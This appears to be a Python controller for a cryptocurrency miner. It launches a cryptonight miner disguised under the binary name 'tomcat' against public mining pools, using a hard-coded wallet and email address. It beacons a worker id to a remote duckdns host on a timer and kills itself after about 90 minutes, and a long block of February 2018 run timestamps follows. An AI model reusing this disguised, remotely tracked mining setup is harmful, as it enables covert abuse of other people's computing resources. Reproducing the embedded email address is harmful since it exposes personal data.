import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:01.352759
#2018-02-17 17:13:06.413201
#2018-02-17 19:01:07.267145
#2018-02-17 20:48:05.634760
#2018-02-17 22:35:05.888821
#2018-02-18 00:19:03.521004
#2018-02-18 02:09:07.063517
#2018-02-18 03:56:04.701487
#2018-02-18 05:44:01.486836
#2018-02-18 07:38:01.629201
#2018-02-18 09:25:06.179772
#2018-02-18 11:11:03.854494
#2018-02-18 12:58:06.840178
#2018-02-18 14:47:05.987991
#2018-02-18 16:36:06.004845
#2018-02-18 18:25:06.990309
#2018-02-18 20:12:05.438427
#2018-02-18 21:58:05.212307
#2018-02-18 23:47:06.767973
#2018-02-19 01:33:06.081141
#2018-02-19 03:21:03.854700
#2018-02-19 05:06:05.144925
#2018-02-19 06:52:01.470390
#2018-02-19 08:41:06.897203
#2018-02-19 10:30:01.631894
#2018-02-19 12:17:07.335744
#2018-02-19 14:04:01.485624
#2018-02-19 15:53:01.643197
#2018-02-19 17:40:11.226167
#2018-02-19 19:28:05.008171
#2018-02-19 21:17:06.720698
#2018-02-19 23:05:01.632031
#2018-02-20 00:48:06.628130
#2018-02-20 02:34:06.487007
#2018-02-20 04:24:04.200096
#2018-02-20 06:08:04.152297
#2018-02-20 07:53:06.422078
#2018-02-20 09:38:06.301178
#2018-02-20 11:22:05.259101
#2018-02-20 13:09:04.794489
#2018-02-20 14:52:09.179256
#2018-02-20 16:39:01.375890
#2018-02-20 18:25:01.309919
#2018-02-20 20:16:04.696584
#2018-02-20 22:02:04.082121
#2018-02-20 23:44:08.072250
#2018-02-21 01:29:03.981631
#2018-02-21 03:18:01.954601
#2018-02-21 05:06:07.623867
#2018-02-21 06:54:06.231603
#2018-02-21 08:40:09.883905
#2018-02-21 10:26:04.786730
#2018-02-21 12:14:06.486536
#2018-02-21 14:03:06.089960
#2018-02-21 15:49:09.871638
#2018-02-21 17:41:01.875554
#2018-02-21 19:26:01.356715
#2018-02-21 21:13:03.703384
#2018-02-21 23:00:10.545190
#2018-02-22 00:49:03.701252
#2018-02-22 02:37:06.318977
#2018-02-22 04:23:07.115378
#2018-02-22 06:11:07.385026
#2018-02-22 07:55:05.865440
#2018-02-22 09:44:07.894071
#2018-02-22 11:30:09.794470
#2018-02-22 13:16:09.830974
#2018-02-22 15:05:08.273917
#2018-02-22 16:48:11.364298
#2018-02-22 18:34:08.042293
#2018-02-22 20:26:07.051035
#2018-02-22 22:12:04.255282
#2018-02-22 23:58:05.298704
#2018-02-23 01:47:05.631743
#2018-02-23 03:32:05.881489
#2018-02-23 05:17:04.357589
#2018-02-23 07:03:06.452460
#2018-02-23 08:53:07.150133
#2018-02-23 11:13:04.669642
#2018-02-23 13:08:08.575649
#2018-02-23 14:53:06.024429
#2018-02-23 16:43:07.648665
#2018-02-23 18:30:08.608104
#2018-02-23 20:14:03.985946
#2018-02-23 22:03:06.609732
#2018-02-23 23:51:07.373106
#2018-02-24 01:42:06.020223
#2018-02-24 03:32:05.289653
#2018-02-24 05:16:06.846271
#2018-02-24 07:06:01.830724
#2018-02-24 08:53:06.902242
#2018-02-24 10:56:05.888373
#2018-02-24 12:46:07.134170
#2018-02-24 14:35:07.975431
#2018-02-24 16:21:05.812146
#2018-02-24 18:15:07.186505
#2018-02-24 20:02:01.951719
#2018-02-24 21:45:09.156957
#2018-02-25 00:46:06.826575
#2018-02-25 04:40:04.973772
#2018-02-25 08:29:01.418537